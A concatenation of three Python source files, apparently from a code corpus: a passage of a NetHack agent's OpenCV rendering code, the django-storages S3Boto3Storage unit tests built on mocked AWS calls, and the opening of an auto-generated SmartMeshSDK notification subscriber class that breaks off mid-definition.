self._display_queue.put(frame[..., ::-1].copy())
if self.renders_history is not None:
self.renders_history.append(frame)
finally:
self._update_dynamic_frame_skipping(render_start_time)
return True
def _render(self):
if not self._force_next_frame and self.frame_skipping is not None:
# static frame skipping
if self.frame_counter % self.frame_skipping != 0:
return None
if self.frame_skipping is None:
# dynamic frame skipping
frame_skipping = self._dynamic_frame_skipping_render_time / self._dynamic_frame_skipping_agent_time / \
self._dynamic_frame_skipping_threshold
if not self._force_next_frame and self.frame_counter <= frame_skipping:
return None
else:
self.frame_counter = 0
if self.last_obs is None:
return None
if self.start_visualize is not None:
if self.env.step_count < self.start_visualize:
return None
if self._force_next_frame:
self.frame_counter = 0
self._force_next_frame = False
glyphs = self.last_obs['glyphs']
tiles_idx = self.glyph2tile[glyphs]
tiles = self.tileset[tiles_idx.reshape(-1)]
scene_vis = draw_grid(tiles, glyphs.shape[1])
for drawer in self.drawers:
scene_vis = drawer(scene_vis)
draw_frame(scene_vis)
topbar = self._draw_topbar(scene_vis.shape[1])
bottombar = self._draw_bottombar(scene_vis.shape[1])
rendered = np.concatenate([topbar, scene_vis, bottombar], axis=0)
inventory = self._draw_inventory(rendered.shape[0])
return np.concatenate([rendered, inventory], axis=1)
def save_end_history(self):
print('SAVING', self.output_dir)
for i, render in enumerate(list(self.renders_history)):
render = render[..., ::-1]
out_path = self.output_dir / (str(i).rjust(5, '0') + '.jpg')
cv2.imwrite(str(out_path), render)
def force_next_frame(self):
self._force_next_frame = True
def stop_display_thread(self):
if self.show:
self._display_process.terminate()
self._display_process.join()
def _display_thread(self):
cv2.namedWindow(self._window_name, cv2.WINDOW_NORMAL | cv2.WINDOW_GUI_NORMAL)
last_size = (None, None)
image = None
while 1:
is_new_image = False
try:
while 1:
try:
image = self._display_queue.get(timeout=0.03)
is_new_image = True
except queue.Empty:
break
if image is None:
image = self._display_queue.get()
is_new_image = True
width = cv2.getWindowImageRect(self._window_name)[2]
height = cv2.getWindowImageRect(self._window_name)[3]
ratio = min(width / image.shape[1], height / image.shape[0])
width, height = round(image.shape[1] * ratio), round(image.shape[0] * ratio)
if last_size != (width, height) or is_new_image:
last_size = (width, height)
resized_image = cv2.resize(image, (width, height), cv2.INTER_AREA)
cv2.imshow(self._window_name, resized_image)
cv2.waitKey(1)
except KeyboardInterrupt:
pass
except (ConnectionResetError, EOFError):
return
cv2.destroyWindow(self._window_name)
def _start_display_thread(self):
if self.show:
self._display_queue = multiprocessing.Manager().Queue()
self._display_process = multiprocessing.Process(target=self._display_thread, daemon=False)
self._display_process.start()
def _update_dynamic_frame_skipping(self, render_start_time):
if self._dynamic_frame_skipping_last_end_time is not None:
self.total_time += time.time() - self._dynamic_frame_skipping_last_end_time
if render_start_time is not None:
render_time = time.time() - render_start_time
else:
render_time = None
agent_time = time.time() - self._dynamic_frame_skipping_last_end_time - \
(render_time if render_time is not None else 0)
if render_start_time is not None:
self._dynamic_frame_skipping_render_time = \
self._dynamic_frame_skipping_render_time * self._dynamic_frame_skipping_exp() + \
render_time * (1 - self._dynamic_frame_skipping_exp())
self._dynamic_frame_skipping_agent_time = \
self._dynamic_frame_skipping_agent_time * self._dynamic_frame_skipping_exp() + \
agent_time * (1 - self._dynamic_frame_skipping_exp())
self._dynamic_frame_skipping_last_end_time = time.time()
def _draw_bottombar(self, width):
height = FONT_SIZE * len(self.last_obs['tty_chars'])
tty = self._draw_tty(self.last_obs, width - width // 2, height)
stats = self._draw_stats(width // 2, height)
return np.concatenate([tty, stats], axis=1)
def _draw_stats(self, width, height):
ret = np.zeros((height, width, 3), dtype=np.uint8)
ch = self.env.agent.character
if ch.role is None:
return ret
# game info
i = 0
txt = [f'Level num: {self.env.agent.current_level().level_number}',
f'Dung num: {self.env.agent.current_level().dungeon_number}',
f'Step: {self.env.step_count}',
f'Turn: {self.env.agent._last_turn}',
f'Score: {self.env.score}',
]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE), color=(255, 255, 255))
i += 3
# general character info
txt = [
{v: k for k, v in ch.name_to_role.items()}[ch.role],
{v: k for k, v in ch.name_to_race.items()}[ch.race],
{v: k for k, v in ch.name_to_alignment.items()}[ch.alignment],
{v: k for k, v in ch.name_to_gender.items()}[ch.gender],
]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE))
i += 1
txt = [f'HP: {self.env.agent.blstats.hitpoints} / {self.env.agent.blstats.max_hitpoints}',
f'LVL: {self.env.agent.blstats.experience_level}',
f'ENERGY: {self.env.agent.blstats.energy} / {self.env.agent.blstats.max_energy}',
]
hp_ratio = self.env.agent.blstats.hitpoints / self.env.agent.blstats.max_hitpoints
hp_color = cv2.applyColorMap(np.array([[130 - int((1 - hp_ratio) * 110)]], dtype=np.uint8),
cv2.COLORMAP_TURBO)[0, 0]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE), color=tuple(map(int, hp_color)))
i += 2
# proficiency info
colors = {
'Basic': (100, 100, 255),
'Skilled': (100, 255, 100),
'Expert': (100, 255, 255),
'Master': (255, 255, 100),
'Grand Master': (255, 100, 100),
}
for line in ch.get_skill_str_list():
if 'Unskilled' not in line:
put_text(ret, line, (0, i * FONT_SIZE), color=colors[line.split('-')[-1]])
i += 1
unskilled = []
for line in ch.get_skill_str_list():
if 'Unskilled' in line:
unskilled.append(line.split('-')[0])
put_text(ret, '|'.join(unskilled), (0, i * FONT_SIZE), color=(100, 100, 100))
i += 2
put_text(ret, 'Unarmed bonus: ' + str(ch.get_melee_bonus(None)), (0, i * FONT_SIZE))
i += 2
stats = list(self.env.agent.stats_logger.get_stats_dict().items())
stats = [(k, v) for k, v in stats if v != 0]
for j in range((len(stats) + 2) // 3):
def format_value(v):
if isinstance(v, float):
return f'{v:.2f}'
return str(v)
put_text(ret, ' | '.join(f'{k}={format_value(v)}' for k, v in stats[j * 3: (j + 1) * 3]),
(0, i * FONT_SIZE), color=(100, 100, 100))
i += 1
i += 1
if hasattr(self.env.agent.character, 'known_spells'):
put_text(ret, 'Known spells: ' + str(list(self.env.agent.character.known_spells)), (0, i * FONT_SIZE))
i += 1
monsters = [(dis, y, x, mon.mname) for dis, y, x, mon, _ in self.env.agent.get_visible_monsters()]
put_text(ret, 'Monsters: ' + str(monsters), (0, i * FONT_SIZE))
draw_frame(ret)
return ret
def _draw_topbar(self, width):
actions_vis = self._draw_action_history(width // 25)
messages_vis = self._draw_message_history(width // 4)
popup_vis = self._draw_popup_history(width // 4)
log_messages_vis = self._draw_debug_message_log(width - width // 25 - width // 4 - width // 4)
ret = np.concatenate([actions_vis, messages_vis, popup_vis, log_messages_vis], axis=1)
assert ret.shape[1] == width
return ret
def _draw_debug_message_log(self, width):
vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.log_messages_history):
break
txt = self.log_messages_history[-i - 1]
if i == 0:
put_text(vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(vis)
return vis
def _update_log_message_history(self):
txt = ''
if self.env.agent is not None:
txt = ' | '.join(self.log_messages)
# if txt:
self.log_messages_history.append(txt)
def _draw_action_history(self, width):
vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.action_history):
break
txt = self.action_history[-i - 1]
if i == 0:
put_text(vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(vis)
return vis
def _draw_message_history(self, width):
messages_vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.message_history):
break
txt = self.message_history[-i - 1]
if i == 0:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(messages_vis)
return messages_vis
def _draw_popup_history(self, width):
messages_vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.popup_history):
break
txt = '|'.join(self.popup_history[-i - 1])
if i == 0:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(messages_vis)
return messages_vis
def _update_message_history(self):
txt = ''
if self.env.agent is not None:
txt = self.env.agent.message
# if txt:
self.message_history.append(txt)
def _update_popup_history(self):
txt = ''
if self.env.agent is not None:
txt = self.env.agent.popup
# if txt:
self.popup_history.append(txt)
def _draw_tty(self, obs, width, height):
vis = np.zeros((int(height * self.tty_downscale),
int(width * self.tty_downscale), 3)).astype(np.uint8)
vis = Image.fromarray(vis)
draw = ImageDraw.Draw(vis)
for i, line in enumerate(obs['tty_chars']):
txt = ''.join([chr(i) for i in line])
draw.text((int(5 * self.tty_downscale), int((5 + i * 31) * self.tty_downscale)),
txt, (255, 255, 255), font=self.font)
vis = np.array(vis.resize((width, height), Image.ANTIALIAS))
draw_frame(vis)
return vis
def _draw_item(self, letter, item, width, height, indent=0):
from ..item import Item
bg_color = {
nh.WAND_CLASS: np.array([0, 50, 50], dtype=np.uint8),
nh.FOOD_CLASS: np.array([0, 50, 0], dtype=np.uint8),
nh.ARMOR_CLASS: np.array([50, 50, 0], dtype=np.uint8),
nh.RING_CLASS: np.array([50, 50, 0], dtype=np.uint8),
nh.SCROLL_CLASS: np.array([30, 30, 30], dtype=np.uint8),
nh.POTION_CLASS: np.array([0, 0, 50], dtype=np.uint8),
}
indent = int((width - 1) * (1 - 0.9 ** indent))
vis = np.zeros((round(height * 0.9), width - indent, 3)).astype(np.uint8)
if item.category in bg_color:
vis += bg_color[item.category]
if item.is_weapon():
if item.is_thrown_projectile() or item.is_fired_projectile():
vis += np.array([50, 0, 50], dtype=np.uint8)
else:
vis += np.array([50, 0, 0], dtype=np.uint8)
if letter is not None:
put_text(vis, str(letter), (0, 0))
status_str, status_col = {
Item.UNKNOWN: (' ', (255, 255, 255)),
Item.CURSED: ('C', (255, 0, 0)),
Item.UNCURSED: ('U', (0, 255, 255)),
Item.BLESSED: ('B', (0, 255, 0)),
}[item.status]
put_text(vis, status_str, (FONT_SIZE, 0), color=status_col)
if item.modifier is not None:
put_text(vis, str(item.modifier), (FONT_SIZE * 2, 0))
best_launcher, best_ammo = self.env.agent.inventory.get_best_ranged_set()
best_melee = self.env.agent.inventory.get_best_melee_weapon()
if item == best_launcher:
put_text(vis, 'L', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item == best_ammo:
put_text(vis, 'A', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item == best_melee:
put_text(vis, 'M', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item.is_weapon():
put_text(vis, str(self.env.agent.character.get_melee_bonus(item)), (FONT_SIZE * 4, 0))
put_text(vis, str(item), (FONT_SIZE * 8, round(FONT_SIZE * -0.1)), scale=FONT_SIZE / 40)
# if len(item.objs) > 1:
vis = np.concatenate([vis, np.zeros((vis.shape[0] // 2, vis.shape[1], 3), dtype=np.uint8)])
put_text(vis, str(len(item.objs)) + ' | ' + ' | '.join((o.name for o in item.objs)),
(0, round(FONT_SIZE * 0.8)), scale=FONT_SIZE / 40)
draw_frame(vis, color=(80, 80, 80), thickness=2)
if item.equipped:
cv2.rectangle(vis, (0, 0), (int(FONT_SIZE * 1.4), vis.shape[0] - 1), (0, 255, 255), 6)
if indent != 0:
vis = np.concatenate([np.zeros((vis.shape[0], width - vis.shape[1], 3), dtype=np.uint8), vis], 1)
return vis
def _draw_inventory(self, height):
width = 800
vis = np.zeros((height, width, 3), dtype=np.uint8)
if self.env.agent:
item_h = round(FONT_SIZE * 1.4)
tiles = []
for i, (letter, item) in enumerate(zip(self.env.agent.inventory.items.all_letters,
self.env.agent.inventory.items.all_items)):
def rec_draw(item, letter, indent=0):
tiles.append(self._draw_item(letter, item, width, item_h, indent=indent))
if item.is_container():
for it in item.content:
rec_draw(it, None, indent + 1)
rec_draw(item, letter, 0)
if tiles:
vis = np.concatenate(tiles, axis=0)
if vis.shape[0] < height:
vis = np.concatenate([vis, np.zeros((height - vis.shape[0], width, 3), dtype=np.uint8)], axis=0)
else:
vis = cv2.resize(vis, (width, height))
draw_frame(vis)
return vis
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import pickle
import threading
import warnings
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_pickle_with_bucket(self):
"""
Test that the storage can be pickled with a bucket attached
"""
# Ensure the bucket has been used
self.storage.bucket
self.assertIsNotNone(self.storage._bucket)
# Can't pickle MagicMock, but you can't pickle a real Bucket object either
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
# Put the mock connection back in
new_storage._connections.connection = mock.MagicMock()
self.assertIsNone(new_storage._bucket)
new_storage.bucket
self.assertIsNotNone(new_storage._bucket)
def test_pickle_without_bucket(self):
"""
Test that the storage can be pickled, without a bucket instance
"""
# Can't pickle a threadlocal
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_with_acl(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'private'
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'image/jpeg',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_storage_write_beyond_buffer_size(self):
"""
Test writing content that exceeds the buffer size
"""
name = 'test_open_for_writïng_beyond_buffer_size.txt'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Initiate the multipart upload
file.write('')
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
multipart = obj.initiate_multipart_upload.return_value
# Write content at least twice as long as the buffer size
written_content = ''
counter = 1
while len(written_content) < 2 * file.buffer_size:
content = 'hello, aws {counter}\n'.format(counter=counter)
# Write more than just a few bytes in each iteration to keep the
# test reasonably fast
content += '*' * int(file.buffer_size / 10)
file.write(content)
written_content += content
counter += 1
# Save the internal file before closing
multipart.parts.all.return_value = [
mock.MagicMock(e_tag='123', part_number=1),
mock.MagicMock(e_tag='456', part_number=2)
]
file.close()
self.assertListEqual(
multipart.Part.call_args_list,
[mock.call(1), mock.call(2)]
)
part = multipart.Part.return_value
uploaded_content = ''.join(
(args_list[1]['Body'].decode('utf-8')
for args_list in part.upload.call_args_list)
)
self.assertEqual(uploaded_content, written_content)
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [
{'ETag': '123', 'PartNumber': 1},
{'ETag': '456', 'PartNumber': 2},
]}
)
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_auto_creating_bucket_with_acl(self):
self.storage.auto_create_bucket = True
self.storage.bucket_acl = 'public-read'
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
self.assertFalse(method.called)
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
# Files:
# some/path/1.txt
# 2.txt
# other/path/3.txt
# 4.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some'},
{'Prefix': 'other'},
],
'Contents': [
{'Key': '2.txt'},
{'Key': '4.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='')
self.assertEqual(dirs, ['some', 'other'])
self.assertEqual(files, ['2.txt', '4.txt'])
def test_storage_listdir_subdir(self):
# Files:
# some/path/1.txt
# some/2.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some/path'},
],
'Contents': [
{'Key': 'some/2.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('some/')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='some/')
self.assertEqual(dirs, ['path'])
self.assertEqual(files, ['2.txt'])
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
def test_location_leading_slash(self):
msg = (
"S3Boto3Storage.location cannot begin with a leading slash. "
"Found '/'. Use '' instead."
)
with self.assertRaises(ImproperlyConfigured, msg=msg):
s3boto3.S3Boto3Storage(location='/')
def test_deprecated_acl(self):
with override_settings(AWS_DEFAULT_ACL=None), warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage(acl='private')
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
message = (
"The acl argument of S3Boto3Storage is deprecated. Use argument "
"default_acl or setting AWS_DEFAULT_ACL instead. The acl argument "
"will be removed in version 2.0."
)
assert str(w[-1].message) == message
def test_deprecated_bucket(self):
with override_settings(AWS_DEFAULT_ACL=None), warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage(bucket='django')
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
message = (
"The bucket argument of S3Boto3Storage is deprecated. Use argument "
"bucket_name or setting AWS_STORAGE_BUCKET_NAME instead. The bucket "
"argument will be removed in version 2.0."
)
assert str(w[-1].message) == message
def test_deprecated_default_acl(self):
with warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage()
assert len(w) == 1
message = (
"The default behavior of S3Boto3Storage is insecure and will change "
"in django-storages 2.0. By default files and new buckets are saved "
"with an ACL of 'public-read' (globally publicly readable). Version 2.0 will "
"default to using the bucket's ACL. To opt into the new behavior set "
"AWS_DEFAULT_ACL = None, otherwise to silence this warning explicitly "
"set AWS_DEFAULT_ACL."
)
assert str(w[-1].message) == message
def test_deprecated_default_acl_override_class_variable(self):
class MyStorage(s3boto3.S3Boto3Storage):
default_acl = "private"
with warnings.catch_warnings(record=True) as w:
MyStorage()
assert len(w) == 0
|
IpMgrSubscribe.py
|
# Warning: Do NOT edit this file directly. Your changes may be overwritten.
# This file is automatically generated by GenIpMgrSubscribe.py
import threading
from SmartMeshSDK import ApiException
class IpMgrSubscribe(object):
'''
\brief Notification listener for IpMgrConnectorMux object
'''
class SubscribeError(Exception) :
def __init__(self, msg) :
self.msg = msg
def __str__(self):
return self.msg
ERROR = "error"
FINISH = "finish"
NOTIFEVENT = "notifEvent"
NOTIFLOG = "notifLog"
NOTIFDATA = "notifData"
NOTIFIPDATA = "notifIpData"
NOTIFHEALTHREPORT = "notifHealthReport"
ALLNOTIF = [NOTIFEVENT, NOTIFLOG, NOTIFDATA, NOTIFIPDATA, NOTIFHEALTHREPORT]
EVENTMOTERESET = "eventMoteReset"
EVENTNETWORKRESET = "eventNetworkReset"
EVENTCOMMANDFINISHED = "eventCommandFinished"
EVENTMOTEJOIN = "eventMoteJoin"
EVENTMOTEOPERATIONAL = "eventMoteOperational"
EVENTMOTELOST = "eventMoteLost"
EVENTNETWORKTIME = "eventNetworkTime"
EVENTPINGRESPONSE = "eventPingResponse"
EVENTPATHCREATE = "eventPathCreate"
EVENTPATHDELETE = "eventPathDelete"
EVENTPACKETSENT = "eventPacketSent"
EVENTMOTECREATE = "eventMoteCreate"
EVENTMOTEDELETE = "eventMoteDelete"
_trNotifNameTable = {
"eventMoteReset" : "notifEvent",
"eventNetworkReset" : "notifEvent",
"eventCommandFinished" : "notifEvent",
"eventMoteJoin" : "notifEvent",
"eventMoteOperational" : "notifEvent",
"eventMoteLost" : "notifEvent",
"eventNetworkTime" : "notifEvent",
"eventPingResponse" : "notifEvent",
"eventPathCreate" : "notifEvent",
"eventPathDelete" : "notifEvent",
"eventPacketSent" : "notifEvent",
"eventMoteCreate" : "notifEvent",
"eventMoteDelete" : "notifEvent",
}
#======================== public ==========================================
def __init__(self, ipMgrConnector) :
# Structure of self._callback :
# Notification Name :
# [0] - subscription mask mask,
# [1] - cb-function. Notification is subscribed if [1]!=None,
# [2] - transport for notification: True - reliable, false - unreliable
self._callback = {
self.ERROR : [0x00, None, True],
self.FINISH : [0x00, None, True],
self.NOTIFEVENT : [0x02, None, True],
